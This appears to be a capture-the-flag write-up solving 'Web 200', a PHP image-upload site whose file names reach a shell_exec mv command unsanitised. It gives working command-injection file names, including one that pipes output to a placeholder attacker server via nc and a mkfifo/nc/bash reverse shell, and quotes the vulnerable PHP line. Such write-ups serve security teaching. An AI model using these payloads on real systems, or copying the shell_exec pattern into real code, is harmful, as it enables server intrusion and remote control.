# Web 200

Web 200 is a php website that lets you upload images. Whenever you upload an
image, it stores it under your 'gallery', so you can see the images that
you've already uploaded.

For every file, it renames it and stores it in the 
`uploads/<phpsession>/<file-index>-<original file name>`  directory of
the website.

The exact same file that is uploaded is what is presented (so no
compression or parsing of the image file in any way happens).

The website declares that only pngs and gifs may be uploaded. It turns
out that the website checks for these filetypes by file extension. That
is, a png file that is renamed to be .jpg will be rejected, and a .jpg
that is renamed to .png will be accepted.

It turns out that we can inject almost arbitrary shell code into the
file names of our images and have them execute. Interestingly enough,
our file names can not have the / character in them, (because that would
be a directory in posix), so we cannot inject / characters.

    “nomnom; pwd | nc <OUR SERVER DNS> 9042;hooray.png"

Uploading a file with this name connected back to our server and dumped
the working directory of the web process.

We created a callback shell, and dug around.

    nomnom; cd .. && cd .. && cd tmp && mkfifo paip; foo.png
    nomnom; cd .. && cd .. && cd tmp && cat paip | nc <OUR SERVER> 1337 | bash > paip; foo.pngo

And found exactly why the filenames were letting us execute arbitrary
code. It's because the php used executed shell code to move our image
into the proper directory.

    shell_exec("mv $tmpfname $userdir/$c-\"\$(echo $file_name | cut -c1-16)\".$ext");

The flag was in the file at `/var/www/picture`

    c5e7b971c62296dcae64fb7fabf169c6
